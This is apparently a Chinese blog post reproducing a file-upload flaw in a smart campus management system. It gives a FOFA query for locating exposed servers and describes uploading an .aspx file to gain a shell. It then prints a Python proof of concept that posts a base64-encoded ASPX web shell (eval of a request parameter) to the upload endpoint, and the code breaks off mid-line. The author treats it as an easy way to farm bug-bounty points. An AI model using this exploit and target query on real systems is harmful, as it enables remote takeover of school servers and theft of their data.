前言
声明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于它用途,希望大家做一个合格的白帽子!
今天中午看到PeiQi师傅发的复现文章,没想到是0day,到晚上在去刷的时候发现已经晚了,分都被刷了。。。
Part.1 漏洞复现
下面开始复现吧,FOFA语句: body="DC_Login/QYSignUp"
48*3=150分 ,上分利器啊!
点开是个统一登录平台,可以看到有个企业注册的按钮
在注册信息里包含着上传附件的模块
可以看到这个上传点对.aspx文件没有任何过滤,直接就能上传
上传成功后还返回了上传的路径
那不是一把梭的嘛!!蚁剑已成功上线!
Part.2 POC
最后附上大师傅的POC:
代码语言:javascript复制import requests
import sys
import random
import re
import base64
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print(' ------------------------------------------')
print(' 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m')
print(' 33[34mGithub : https://github.com/PeiQi0 33[0m')
print(' 33[34m公众号 : PeiQi文库 33[0m')
print(' 33[34mVersion: 智慧校园管理系统 33[0m')
print(' 33[36m使用格式: python3 poc.py 33[0m')
print(' 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m')
print(' ------------------------------------------')
def POC_1(target_url):
vuln_url = target_url "/DC_OA_WJG/Upload"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNxqOHxbHqt9mf7s5",
}
data = base64.b64decode("LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5TnhxT0h4YkhxdDltZjdzNQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwRmlsZSI7IGZpbGVuYW1lPSJQZWlRaS5hc3B4IgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQoKPHNjcmlwdCBsYW5ndWFnZT0iSlNjcmlwdCIgcnVuYXQ9InNlcnZlciI ZnVuY3Rpb24gUGFnZV9Mb2FkKCl7ZXZhbChSZXF1ZXN0WyJQZWlRaSJdLCJ1bnNhZmUiKTt9PC9zY3JpcHQ CgotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlOeHFPSHhiSHF0OW1mN3M1LS0=")
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("